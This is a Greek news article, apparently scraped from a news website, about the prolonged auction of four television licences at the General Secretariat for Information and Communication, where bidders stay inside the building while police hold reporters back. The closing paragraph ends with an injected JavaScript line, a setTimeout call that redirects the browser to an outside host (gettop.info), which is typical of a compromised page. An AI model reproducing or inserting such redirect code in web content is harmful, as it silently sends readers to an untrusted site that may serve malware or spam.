Συνεχίζεται η μαραθώνια διαδικασία για τις άδειες – Κινητικότητα έξω από τη ΓΓΕΕ

0
5

 

Πενήντα ώρες συμπληρώθηκαν από τη στιγμή που ξεκίνησε η διαδικασία για τη δημοπράτηση των τεσσάρων τηλεοπτικών αδειών στο κτίριο της Γενικής Γραμματειας Ενημέρωσης και Επικοινωνίας.

Η διαδικασία εξελίσσεται οαμλά ενώ «μάχη» δίνεται για την τέταρτη τηλεοπτική άδεια.

Κανείς δεν γνωρίζει τι ακριβώς συμβαίνει στ οεσωτερικό του κτιρίου ενώ ακοη και αυτοί που πήραν τις τρεις άδειες είναι υποχρεωμένοι να παραμείνουν στα ειδικά διαμορφωμένα γραφεία τους μέχρι την ολοκλήρωση της διαδικασίας της δημοπρασίας και για τις τέσσερις τηλεοπτικές άδειες.

Το πρωί της Τετάρτης υπήρξε βροχή ασφαλιστικών μέτρων από όλους τους τηλεοπτικούς σταθμούς που στρέγονταν είτε κατά της διαδικασίας είτε κατά των ίδιων των επιχειρηματιών μεταξύ τους. Απόφαση αναμενόταν μέχρι χθες υτο βράδυ ωστόσο η διαδικασία συνεχίζεται ακόμη.

Μόλις ολοκληρωθεί η δημοπρασία της τέταρτης άδειας, το αποτέλεσμα της διαδικασίας θα καθαρογραφεί, οι τέσσερις πλειοδότες θα υπογράψουν κι έπειτα θα βγουν από το κτίριο. Η αστυνομία απομακρύνει αυτήν τη στγμή από το σημείο που στέκονται τους οπερατέρ και τους δημοσιογράφους επαναφέροντάς τους στην αρχική τους θέση καθώς αναμένεται μετά τις 11.00 να έχουμε «λευκό καπνό» από το κτίριο της ΓΓΕΕ. Ακόμη δνε είναι γνωστό αν οι τέσσερις εκπρόσωποι που δεν κατάφεραν να αποκτήσουν άδεια θα βγουν νωρίτερα πό το κτίριο αν κι επιθυμείται να διατηρηθεί το απόρρητο μέχρι τελευταία στιγμή. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here